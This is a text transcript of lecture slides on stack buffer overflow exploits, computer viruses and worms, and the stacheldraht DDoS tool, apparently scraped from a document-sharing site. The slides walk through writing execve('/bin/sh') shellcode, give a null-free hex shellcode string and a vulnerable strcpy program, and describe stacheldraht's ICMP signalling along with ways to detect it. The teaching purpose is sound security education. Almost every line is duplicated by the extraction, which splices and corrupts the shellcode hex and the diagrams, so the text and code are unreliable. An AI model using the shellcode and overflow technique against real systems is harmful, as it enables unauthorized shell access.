buffer overflow

49
Exploits Exploits By Hon Ching Lo By Hon Ching Lo

Upload: er-umesh-thoriya

Post on 06-Dec-2015

20 views

Category:

Documents


2 download

TRANSCRIPT

Page 1: Buffer Overflow

ExploitsExploitsBy Hon Ching LoBy Hon Ching Lo

Page 2: Buffer Overflow

1. 1. Buffer OverflowBuffer Overflow

2. 2. Virus & WormsVirus & Worms

3. 3. The “stacheldraht” The “stacheldraht” distributed denial of distributed denial of service attack tool service attack tool

Page 3: Buffer Overflow

Stack Buffer Overflow Stack Buffer Overflow BasicsBasics A process in memory:A process in memory:

- text (Program code; marked - text (Program code; marked read-only, so any attempts toread-only, so any attempts to write to it will result in write to it will result in segmentation fault)segmentation fault) - data segment (Global and - data segment (Global and static variables)static variables) - stack (Dynamic variables)- stack (Dynamic variables)

The process is blocked and is The process is blocked and is rescheduled to run again with a rescheduled to run again with a larger memory space if the user larger memory space if the user attack exhausts available memory.attack exhausts available memory.

Lower memory addresses

Higher memory addresses

Page 4: Buffer Overflow

Stack BasicsStack Basics

A stack is contiguous block of memory containing A stack is contiguous block of memory containing data.data.

Stack pointer (SP) – a register that points to the Stack pointer (SP) – a register that points to the top of the stack.top of the stack.

The bottom of the stack is at fixed address.The bottom of the stack is at fixed address. Its size is dynamically adjusted by kernel at run Its size is dynamically adjusted by kernel at run

time.time. CPU implements instructions to PUSH onto and CPU implements instructions to PUSH onto and

POP off the stack.POP off the stack.

Page 5: Buffer Overflow

Stack BasicsStack Basics A stack consists of logical stack A stack consists of logical stack

frames that are pushed when frames that are pushed when calling a function and popped when calling a function and popped when returning. returning. Frame pointer (FP) – points to a Frame pointer (FP) – points to a fixed location within a frame.fixed location within a frame.

When a function is called, the When a function is called, the return address, stack frame pointer return address, stack frame pointer and the variables are pushed on and the variables are pushed on the stack (in that order). the stack (in that order).

So the return address has a higher So the return address has a higher address as the buffer. address as the buffer.

When we overflow the buffer, the When we overflow the buffer, the return address will be overwritten. return address will be overwritten.

High memory addresses

Lower memory addresses

Page 6: Buffer Overflow

void function(){void function(){

……

return;return;

}}

void main(){void main(){

....

Function();Function();

....

}}

Page 7: Buffer Overflow

Another Example Code Another Example Code

void function(int a, int b, int c) {void function(int a, int b, int c) { char buffer1[5]; char buffer1[5]; char buffer2[10]; char buffer2[10]; } }

void main(){ void main(){ function(1,2,3); function(1,2,3); }}

Page 8: Buffer Overflow

Stack layout for the example codeStack layout for the example code

bottom of bottom of top of top of

memory memory memory memory

buffer2 buffer2 buffer1 sfp ret a b cbuffer1 sfp ret a b c

<------ [ ][ ][ ][ ][ ][ ][ ] <------ [ ][ ][ ][ ][ ][ ][ ]

Top of stack Top of stack bottom of bottom of stack stack

Page 9: Buffer Overflow

General Form of Security Attack Achieves Two Goals:General Form of Security Attack Achieves Two Goals:

1. Inject the attack code, which is typically a small 1. Inject the attack code, which is typically a small sequence of instructions that spawns a shell, into sequence of instructions that spawns a shell, into a running process.a running process.

2. Change the execution path of the running 2. Change the execution path of the running process to execute the attack code.process to execute the attack code.

Overflowing stack buffers can achieve both Overflowing stack buffers can achieve both

goals simultaneously.goals simultaneously.

Page 10: Buffer Overflow

How can we place arbitrary How can we place arbitrary instruction into its address space?instruction into its address space?

--place the code that you are trying to place the code that you are trying to execute in the buffer we are execute in the buffer we are overflowing, and overwrite the return overflowing, and overwrite the return address so it points back into the address so it points back into the buffer. buffer.

Page 11: Buffer Overflow

bottom of bottom of top of top of

memorymemory memorymemory

DDDDDDDEEEEEEEEEEEE EEEE FFFF FFFF FFFF FFFFDDDDDDDEEEEEEEEEEEE EEEE FFFF FFFF FFFF FFFF

89ABCDEF0123456789AB CDEF 0123 4567 89AB CDEF 89ABCDEF0123456789AB CDEF 0123 4567 89AB CDEF

buffer buffer sfp ret a b c sfp ret a b c

<---- [SSSSSSSSSSSSSSSSSSS] [SSSS][0xD8][0x01][0x02][0x03] <---- [SSSSSSSSSSSSSSSSSSS] [SSSS][0xD8][0x01][0x02][0x03]

^̂ | |

|____________________________| |____________________________|

top of top of bottom of bottom of

stackstack stackstack

We want:We want:

Page 12: Buffer Overflow

(i) Before the attack (ii) after injecting the attack code

Page 13: Buffer Overflow

(iii) executing the attack code

Page 14: Buffer Overflow

Shellcode.cShellcode.c

#include<stdio.h> #include<stdio.h>

void main() { void main() {

char *name[2]; char *name[2];

name[0] = "/bin/sh"; name[0] = "/bin/sh";

name[1] = NULL; name[1] = NULL;

execve(name[0], name, NULL); execve(name[0], name, NULL);

}}

Page 15: Buffer Overflow

After compiling the code and starting up gdb, we After compiling the code and starting up gdb, we have the shellcode in assembly:have the shellcode in assembly:

Page 16: Buffer Overflow

Some modifications to the Some modifications to the shellcode:shellcode:

We want the program to exit cleanly if the execve We want the program to exit cleanly if the execve syscall fails. We add exit(0); as the last line in the syscall fails. We add exit(0); as the last line in the code.code.

Page 17: Buffer Overflow

Our list of steps:Our list of steps: Have the null terminated string Have the null terminated string

"/bin/sh" somewhere in memory. "/bin/sh" somewhere in memory. Have the address of the string Have the address of the string

"/bin/sh" somewhere in memory "/bin/sh" somewhere in memory followed by a null long word. followed by a null long word.

Copy 0xb into the EAX register. Copy 0xb into the EAX register. Copy the address of the address of Copy the address of the address of

the string "/bin/sh" into the EBX the string "/bin/sh" into the EBX register. register.

Copy the address of the string Copy the address of the string "/bin/sh" into the ECX register. "/bin/sh" into the ECX register.

Copy the address of the null long Copy the address of the null long word into the EDX register. word into the EDX register.

Execute the int $0x80 instruction. Execute the int $0x80 instruction. Copy 0x1 into the EAX register. Copy 0x1 into the EAX register. Copy 0x0 into the EBX register. Copy 0x0 into the EBX register. Execute the int $0x80 instruction. Execute the int $0x80 instruction.

Trying to put this together in Trying to put this together in Assembly languageAssembly language, we have:, we have:

movl string_addr,string_addr_addr movl string_addr,string_addr_addr movb $0x0,null_byte_addr movb $0x0,null_byte_addr movl $0x0,null_addr movl $0x0,null_addr movl $0xb,%eax movl $0xb,%eax movl string_addr,%ebx movl string_addr,%ebx leal string_addr,%ecx leal string_addr,%ecx leal null_string,%edx leal null_string,%edx int $0x80 int $0x80 movl $0x1, %eax movl $0x1, %eax movl $0x0, %ebx movl $0x0, %ebx int $0x80 int $0x80 /bin/sh string goes here./bin/sh string goes here.

Then, place the string after the code.

Page 18: Buffer Overflow

Problem: Problem:

we don’t know where in the memory space of the program we don’t know where in the memory space of the program we’re trying to exploit the code (the string that follows it) will we’re trying to exploit the code (the string that follows it) will be placed.be placed.

Solution:Solution:

--Place a CALL instruction right before the --Place a CALL instruction right before the “/bin/sh” string, and a JMP instruction to it.“/bin/sh” string, and a JMP instruction to it.

--the string’s address will be pushed onto --the string’s address will be pushed onto the stack as the return when CALL is the stack as the return when CALL is executed. (Basically, CALL instruction executed. (Basically, CALL instruction pushes the IP onto the stack) pushes the IP onto the stack)

Page 19: Buffer Overflow

Inserting JMP and CALL instructionsInserting JMP and CALL instructions

bottom of bottom of top top of memory of memory memory memory

DDDDDDDEEEEEEEEEEEE EEEE FFFF FFFF FFFF FFFF DDDDDDDEEEEEEEEEEEE EEEE FFFF FFFF FFFF FFFF

89ABCDEF0123456789AB CDEF 0123 4567 89AB CDEF 89ABCDEF0123456789AB CDEF 0123 4567 89AB CDEF

buffer buffer sfp ret a b c sfp ret a b c

<---[JJSSSSSSSSSSSSSSCCss][ssss][0xD8][0x01][0x02][0x03] ^|^ <---[JJSSSSSSSSSSSSSSCCss][ssss][0xD8][0x01][0x02][0x03] ^|^ ^| | ^| |

|||_______________| |__________| (1) |||_______________| |__________| (1)

(2)(2) ||_______________| | ||_______________| |

|_________________| (3) |_________________| (3)

top of stack top of stack bottom of bottom of stack stack

Page 20: Buffer Overflow

Running the shellcodeRunning the shellcode

We must place the code we wish to We must place the code we wish to execute in the stack or data segment. execute in the stack or data segment.

(Recall: text region of a process is (Recall: text region of a process is

marked read-only)marked read-only)

To do so, we’ll place our code in a global To do so, we’ll place our code in a global array in the data segment. We need hex array in the data segment. We need hex representation of the binary code.representation of the binary code.

Page 21: Buffer Overflow

shellcodeasm.cshellcodeasm.c

Page 22: Buffer Overflow
Page 23: Buffer Overflow

Obstacle: There must be no null bytes in the shellcode for the exploit Obstacle: There must be no null bytes in the shellcode for the exploit to work. to work. Reason: null bytes in our shellcode will be considered the end of the Reason: null bytes in our shellcode will be considered the end of the string the copy will be terminated when encountering the null string the copy will be terminated when encountering the null

character. character.

After eliminating null bytes, shellcode in Hex representation (Note: After eliminating null bytes, shellcode in Hex representation (Note: different hardware architecture has different Hex. Representation of different hardware architecture has different Hex. Representation of binary code):binary code):

char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\

xff\xff\xff/bin/sh";xff\xff\xff/bin/sh";

Page 24: Buffer Overflow

vulnerable.cvulnerable.c

void main(int argc, char *argv[]) { void main(int argc, char *argv[]) {

char buffer[512]; char buffer[512];

if (argc > 1)if (argc > 1)

strcpy(buffer,argv[1]); strcpy(buffer,argv[1]);

} }

Page 25: Buffer Overflow

Computer Virus and WormsComputer Virus and Worms

Page 26: Buffer Overflow

Computer viruses Computer viruses - parasitic programs which are designed to alter the way a - parasitic programs which are designed to alter the way a

computer operates without the permission or knowledge of computer operates without the permission or knowledge of the user. the user.

-must meet two criteria: -must meet two criteria: -must execute itself. it will often place its own code in the -must execute itself. it will often place its own code in the path of execution of another program. path of execution of another program. - must replicate itself. - must replicate itself. - require infected host file, but worms don't. - require infected host file, but worms don't. - they incorporate themselves within executable program - they incorporate themselves within executable program

files. files. - some infects in files such as MS-Word and MS-Excel - some infects in files such as MS-Word and MS-Excel

(because we could put strings of program commands (because we could put strings of program commands (called "macros") in the data files) (called "macros") in the data files)

- some attach themselves to boot records. - some attach themselves to boot records. - they infects in files until the layload. - they infects in files until the layload.

Page 27: Buffer Overflow

Components: Components:

- replication mechanism - replication mechanism

allows virus to copy allows virus to copy itself itself - protection mechanism - protection mechanism hides virus from hides virus from detection detection - the trigger - the trigger set off the payload set off the payload - the payload - the payload effect of the viruseffect of the virus

Effects: Effects:

damages programs by damages programs by corrupting data with or corrupting data with or without pattern, deleting without pattern, deleting files, or reformatting the files, or reformatting the hard disk. hard disk.

replicate themselves by replicate themselves by presenting text, video, and presenting text, video, and audio messages. audio messages.

This may cause system This may cause system crashes and data loss since crashes and data loss since they take up computer they take up computer memory used by memory used by legitimate programs. legitimate programs.

Page 28: Buffer Overflow

Types of viruses:Types of viruses:

file infector file infector

- infects program files. - infect - infects program files. - infect executable code (like .com executable code (like .com and exe files) and exe files)

- usually append the virus code - usually append the virus code to the file, hide itself.to the file, hide itself.

- they're memory resident (any - they're memory resident (any

noninfected executable that noninfected executable that runs becomes infected after runs becomes infected after memory becomes infected.) memory becomes infected.)

[e.g. Jerusalem and Cascade][e.g. Jerusalem and Cascade]

macro virus macro virus

- small macro written to - small macro written to annoy people and infect data annoy people and infect data files. make use of another files. make use of another program's internal program's internal programming language, which programming language, which was created to allow users to was created to allow users to automate certain tasks within automate certain tasks within the program. the program.

[e.g. W97M.Melissa, [e.g. W97M.Melissa, WM.NiceDay and WM.NiceDay and W97M.Groov]W97M.Groov]

Page 29: Buffer Overflow

Types of Virus cont’Types of Virus cont’

boot sector boot sector

- infects the system area of a disk, - infects the system area of a disk, which is boot record on floppy which is boot record on floppy disks and hard disks. disks and hard disks.

- the most common type viruses, - the most common type viruses, and cannot normally spread and cannot normally spread across a network. across a network.

- target on all PCs. - target on all PCs. - activated when the user attempts - activated when the user attempts

to start up from the infected disk. to start up from the infected disk. - It's usually spread by accident via - It's usually spread by accident via

floppy disks, new software, new floppy disks, new software, new repaired hardware etc. repaired hardware etc.

[ e.g. Form, Disk Killer, Michelangelo [ e.g. Form, Disk Killer, Michelangelo and Stoned] and Stoned]

master boot record master boot record

- memory resident viruses that - memory resident viruses that infect disks in the same manner infect disks in the same manner as boot sector viruses. as boot sector viruses.

- master boot record infectors save - master boot record infectors save a legitimate copy of the master a legitimate copy of the master boot record in a different location. boot record in a different location.

- different OS accesses its boot - different OS accesses its boot information differently. information differently.

- If Windows NT is formatted with - If Windows NT is formatted with FAT partitions could remove virus FAT partitions could remove virus by booting to DOS and using by booting to DOS and using antivirus software. antivirus software.

- If boot partition is NTFS, the - If boot partition is NTFS, the system must be recovered by system must be recovered by using the 3 Windows NY setup using the 3 Windows NY setup disks. disks.

[e.g. master boot record infector [e.g. master boot record infector NYB, AntiExe and Unashamed :p ] NYB, AntiExe and Unashamed :p ]

Page 30: Buffer Overflow

Types of Virus cont’Types of Virus cont’ multipartite viruses (polypartite) multipartite viruses (polypartite)

- infects both boot sectors and program files. - infects both boot sectors and program files. - particularly difficult to repair. - particularly difficult to repair. - if boot sectors are not infected, clean files will be reinfected and - if boot sectors are not infected, clean files will be reinfected and vice versa. vice versa. [ e.g. One_Half, Emperor, Anthrax and Tequiulla] [ e.g. One_Half, Emperor, Anthrax and Tequiulla]

Some sites consider the following types of virus: Some sites consider the following types of virus:

Trojan horse - a program that is designed to cause damage or Trojan horse - a program that is designed to cause damage or compromise the security of your system. - it compromise the security of your system. - it doesn't replicates itself. doesn't replicates itself. [e.g. PWSteal.Trojan is NOT a name of a virus] [e.g. PWSteal.Trojan is NOT a name of a virus]

Worm - a program tat replicate themselves from system to system Worm - a program tat replicate themselves from system to system WITHOUT the use of a host file. WITHOUT the use of a host file. [ e.g PrettyPark.Worm ] [ e.g PrettyPark.Worm ]

Page 31: Buffer Overflow

Computer Virus vs WormComputer Virus vs Worm

Viruses are designed to spread themselves from Viruses are designed to spread themselves from a file to another on a computer. [depend on a file to another on a computer. [depend on human aids]human aids]

Worms are designed to spread themselves from Worms are designed to spread themselves from one computer to another over a network. (e.g by one computer to another over a network. (e.g by using email) [don't need help from human being] using email) [don't need help from human being]

Page 32: Buffer Overflow

Worms:Worms: spread easily they can replicate themselves spread easily they can replicate themselves

without attaching to other programs without attaching to other programs

deceiving trick people into thinking that they're deceiving trick people into thinking that they're benigh attachment (often in emails) benigh attachment (often in emails)

damaging rename and hide your files, keep the damaging rename and hide your files, keep the filename and path but overwrite the data, deleted filename and path but overwrite the data, deleted files cannot be retrieved once being overwritten.files cannot be retrieved once being overwritten.

easy to create easy to create

Page 33: Buffer Overflow

what worms do?what worms do? replicate themselves. replicate themselves.

If they had payload (a destructive sequence actived on a certain If they had payload (a destructive sequence actived on a certain trigger; the trigger may be the arrival of a particular data or an trigger; the trigger may be the arrival of a particular data or an action by the user), they may display text mesage to warn you or action by the user), they may display text mesage to warn you or they even rename and overwrite all the files on your hard drive. they even rename and overwrite all the files on your hard drive.

consume system resources (e.g. change file sizes, report incorrect consume system resources (e.g. change file sizes, report incorrect RAM) RAM)

create back doors into your systems, allowing unauthorized create back doors into your systems, allowing unauthorized access. access.

steal password and file information - consume network resources steal password and file information - consume network resources (example: ILOVEYOU worm send itself out at scheduled intervals) (example: ILOVEYOU worm send itself out at scheduled intervals)

Page 34: Buffer Overflow

The “stacheldraht” The “stacheldraht” distributed denial of service distributed denial of service

attack toolattack tool

Page 35: Buffer Overflow

Distributed Denial of Service Distributed Denial of Service (DDos)(DDos)

It contains two phase attacks:It contains two phase attacks:

1. 1. mass-intrusion phasemass-intrusion phase, in which automated , in which automated tools are used to remotely root tools are used to remotely root compromise large numbers (i.e., in the compromise large numbers (i.e., in the several hundred to several thousand several hundred to several thousand ranges) and the distributed denial of ranges) and the distributed denial of service agents are installed on these service agents are installed on these compromised systems. These are compromised systems. These are primary primary victimsvictims (of system compromise.) (of system compromise.)

Page 36: Buffer Overflow

DDos cont’ – 2DDos cont’ – 2ndnd phase of atttack phase of atttack

the actual denial of service attack the actual denial of service attack phasephase, in which these compromised , in which these compromised systems which constitute the systems which constitute the handlers and agents of the handlers and agents of the distributed attack network are used distributed attack network are used to wage massive denial of service to wage massive denial of service attacks against one or more sites. attacks against one or more sites. These are These are secondary victimssecondary victims (of (of denial of service). denial of service).

Page 37: Buffer Overflow

The network: client(s) The network: client(s) handlers handlers agent(s) agent(s) victims victims

http://staff.washington.edu/dittrich/http://staff.washington.edu/dittrich/misc/stacheldraht.analysis.txtmisc/stacheldraht.analysis.txt

Page 38: Buffer Overflow

The attacker(s) control one or more handlers The attacker(s) control one or more handlers using encrypting clients.using encrypting clients.

Each handler can control many agents. (There is Each handler can control many agents. (There is an internal limit in the "mserv.c" code to 1000 an internal limit in the "mserv.c" code to 1000 agents. agents.

The agents are all instructed to coordinate a The agents are all instructed to coordinate a packet based attack against one or more victim packet based attack against one or more victim systems by the handler (referred to as an systems by the handler (referred to as an "mserver" or "master server" in the code.) "mserver" or "master server" in the code.)

The stacheldraht networkThe stacheldraht network

Page 39: Buffer Overflow

CommunicationCommunication Stacheldraht uses TCP and ICMP for handler and Stacheldraht uses TCP and ICMP for handler and

agents to communicate with each other.agents to communicate with each other.

Remote control of a stacheldraht network is Remote control of a stacheldraht network is accomplished using a simple client that uses accomplished using a simple client that uses symmetric key encryption for communication symmetric key encryption for communication between itself and the handler. between itself and the handler.

The client accepts a single argument, the address The client accepts a single argument, the address of the handler to which it should connect. It then of the handler to which it should connect. It then connects using a TCP port (default 16660/tcp in connects using a TCP port (default 16660/tcp in the analyzed code). the analyzed code).

Page 40: Buffer Overflow

The attacker sees the following:The attacker sees the following: ------------------------------------------------------------------------- # ./client ------------------------------------------------------------------------- # ./client

192.168.0.1 [*] stacheldraht [*] (c) in 1999 by ... trying to 192.168.0.1 [*] stacheldraht [*] (c) in 1999 by ... trying to connect... connection established.connect... connection established.

-------------------------------------- -------------------------------------- enter the passphrase : sicken enter the passphrase : sicken -------------------------------------- -------------------------------------- entering interactive session. ****************************** entering interactive session. ****************************** welcome to stacheldraht welcome to stacheldraht ****************************** ****************************** type .help if you are lame type .help if you are lame stacheldraht(status: a!1 d!0)> stacheldraht(status: a!1 d!0)> --------------------------------------------------------------------------- ---------------------------------------------------------------------------

Page 41: Buffer Overflow

Some characteristics ofSome characteristics of stacheldrahtstacheldraht

Strings embedded in the encrypting client Strings embedded in the encrypting client ("client"), the handler(“mserv”) and the ("client"), the handler(“mserv”) and the agent(“td”)agent(“td”)

It employs the Berkeley "rcp" command It employs the Berkeley "rcp" command (514/tcp), using a stolen account at some (514/tcp), using a stolen account at some site as a cache. On demand, all agents are site as a cache. On demand, all agents are instructed to delete the current program instructed to delete the current program image, go out and get a new copy (either image, go out and get a new copy (either Linux- or Solaris-specific binary) from a Linux- or Solaris-specific binary) from a site/account using "rcp", start running this site/account using "rcp", start running this new image with "nohup", and then exit. new image with "nohup", and then exit.

Page 42: Buffer Overflow

What agents do?What agents do?

Finding an active handler:Finding an active handler:

When each agent starts up, it attempts to read a master server When each agent starts up, it attempts to read a master server configuration file to learn which handler(s) may control it. configuration file to learn which handler(s) may control it.

It then starts at the beginning of the list of handlers and sends an It then starts at the beginning of the list of handlers and sends an ICMP_ECHOREPLY packet with an ID field containing the value 666 ICMP_ECHOREPLY packet with an ID field containing the value 666 and data field containing the string "skillz". If the master gets this and data field containing the string "skillz". If the master gets this packet, it sends back an ICMP_ECHOREPLY packet with an ID field packet, it sends back an ICMP_ECHOREPLY packet with an ID field containing the value 667 and data field containing the string containing the value 667 and data field containing the string "ficken". "ficken".

The handler and agent continue periodically sending these 666|The handler and agent continue periodically sending these 666|skillz / 667|ficken packets back and forth. skillz / 667|ficken packets back and forth.

Page 43: Buffer Overflow

What agents do?What agents do?The agent performs a test to see if the network onThe agent performs a test to see if the network onwhich the agent is running allows packets to exit which the agent is running allows packets to exit with forged source addresses. with forged source addresses.

It does this by sending out an ICMP ECHO packet It does this by sending out an ICMP ECHO packet with a forged IP address of "3.3.3.3", an ID of 666, with a forged IP address of "3.3.3.3", an ID of 666, and the IP address of the agent system (obtained and the IP address of the agent system (obtained by getting the hostname, then resolving this to an by getting the hostname, then resolving this to an IP address) in the data field of the ICMP packet. IP address) in the data field of the ICMP packet.

Page 44: Buffer Overflow

What agents do?What agents do? If the master receives this packet, it replies to the If the master receives this packet, it replies to the

IP address embedded in the packet with an IP address embedded in the packet with an ICMP_ECHOREPLY packet containing an ID of ICMP_ECHOREPLY packet containing an ID of 1000 and the word "spoofworks" in the data field. 1000 and the word "spoofworks" in the data field.

If the agent receives this packet, it sets a If the agent receives this packet, it sets a spoof_level of 0 (can spoof all 32 bits of IP spoof_level of 0 (can spoof all 32 bits of IP address). If it times out before receiving a spoof address). If it times out before receiving a spoof reply packet, it sets a spoof_level of 3 (can only reply packet, it sets a spoof_level of 3 (can only spoof the final octet). spoof the final octet).

Page 45: Buffer Overflow

What agents do?What agents do?

There is also a code in the agent to performThere is also a code in the agent to performan ID test, an ID test,

sending an ICMP_ECHOREPLY packet with sending an ICMP_ECHOREPLY packet with an ID field value of 669, and the string an ID field value of 669, and the string "sicken\n" in the data field. "sicken\n" in the data field.

This code is triggered if the agent is sent This code is triggered if the agent is sent an ICMP_ECHOREPLY packet with an ID an ICMP_ECHOREPLY packet with an ID field containing the value 668. field containing the value 668.

Page 46: Buffer Overflow

DefensesDefenses Because the programs use ICMP_ECHOREPLY packets for Because the programs use ICMP_ECHOREPLY packets for

communication, it will be communication, it will be very difficultvery difficult (if not impossible) to (if not impossible) to block it without breaking most Internet programs that rely block it without breaking most Internet programs that rely on ICMP. on ICMP.

The Phrack paper on LOKI states: The only sure way to The Phrack paper on LOKI states: The only sure way to destroy this channel is to deny ALL ICMP_ECHO traffic into destroy this channel is to deny ALL ICMP_ECHO traffic into your network. your network.

Short of rejecting this traffic, it will instead be necessary to Short of rejecting this traffic, it will instead be necessary to observe the difference between "normal" use of ICMP_ECHO observe the difference between "normal" use of ICMP_ECHO and ICMP_ECHOREPLY packets by programs like "ping". This and ICMP_ECHOREPLY packets by programs like "ping". This will not be an easy task, especially on large networks. will not be an easy task, especially on large networks.

Page 47: Buffer Overflow

WeaknessesWeaknesses1.1. If the source has not been modified, you can If the source has not been modified, you can

identify stacheldraht clients/handlers/agents by identify stacheldraht clients/handlers/agents by the embedded strings shown earlier. the embedded strings shown earlier.

2.2. Monitoring "rcp" connections (514/tcp) from Monitoring "rcp" connections (514/tcp) from multiple systems on your network, in quick multiple systems on your network, in quick succession, to a single IP address outside your succession, to a single IP address outside your network would be a good trigger. network would be a good trigger.

3.3. Watch for this to show up in the source address Watch for this to show up in the source address of outgoing unsolicited ICMP_ECHOREPLY of outgoing unsolicited ICMP_ECHOREPLY packets. packets.

4.4. observe these strings in the data portion of observe these strings in the data portion of ICMP packets using programs like "ngrep" ICMP packets using programs like "ngrep"

Page 48: Buffer Overflow

WeaknessesWeaknesses If the command values have not been changed If the command values have not been changed

from the default, as few as just one packet would from the default, as few as just one packet would be necessary to flush out an agent. Either: be necessary to flush out an agent. Either:

a). send an ICMP_ECHOREPLY packet with an ID field a). send an ICMP_ECHOREPLY packet with an ID field

value of 668 and watch for an ICMP_ECHOREPLY value of 668 and watch for an ICMP_ECHOREPLY packet to come back with an ID field value of 669 packet to come back with an ID field value of 669 and the string "sicken\n" in the data field, or and the string "sicken\n" in the data field, or

b). send an ICMP_ECHOREPLY packet with a source b). send an ICMP_ECHOREPLY packet with a source address of "3.3.3.3" (and ID value of 666 and data address of "3.3.3.3" (and ID value of 666 and data field with "skillz" if you want to go all out) and field with "skillz" if you want to go all out) and watch for an ICMP_ECHOREPLY packet to come back watch for an ICMP_ECHOREPLY packet to come back with an ID field value of 1000 and the string with an ID field value of 1000 and the string "spoofworks" in the data field. "spoofworks" in the data field.

Page 49: Buffer Overflow

The EndThe End